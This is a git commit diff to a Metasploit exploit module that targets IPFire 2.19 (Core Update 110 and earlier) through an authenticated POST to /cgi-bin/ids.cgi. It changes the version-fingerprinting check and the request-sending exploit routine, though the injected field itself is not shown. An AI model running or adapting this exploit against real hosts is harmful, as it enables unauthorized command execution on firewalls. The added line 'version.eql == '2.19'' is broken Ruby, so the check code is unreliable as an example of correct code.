bcole fixes

h00die · h00die · commit f9493f46d7ce · 2017-06-24T14:06:11.000-04:00
diff --git a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@@ -66,31 +66,35 @@ def check
         'method'        => 'GET',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
       )
-      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
-      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
-      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
 
-      if version && update && version.eql? "2.19" && update.to_i <= 110
+      if res and res.code == 200
+        /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+      end
+
+      # now that we've pulled the info we need, check version.
+      if version && update && version.eql == '2.19' && update.to_i <= 110
         CheckCode::Appears
       else
         CheckCode::Safe
       end
+
     rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+      CheckCode::Safe
     end
   end
 
   def exploit
     begin
       # authorization header required, see https://github.com/rapid7/metasploit-framework/pull/6433#r56764179
       # after a chat with @bcoles in IRC.
+      vprint_status('Sending request')
       res = send_request_cgi(
         'uri'           => '/cgi-bin/ids.cgi',
         'method'        => 'POST',
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers'       =>
           {
-            'Referer' => "#{datstore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+            'Referer' => "#{datastore['SSL'] ? 'https' : 'http'}://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
           },
         'vars_post'          => {
             'ENABLE_SNORT_GREEN' => 'on',
@@ -102,11 +106,9 @@ def exploit
           }
       )
 
-      # success means we hang our session, and wont get back a response
-      if res
-        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
-      else
-        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response")
+      # success means we hang our session, and wont get back a response, so just check we get a response back
+      if res  && res.code != 200
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
       end
 
     rescue ::Rex::ConnectionError
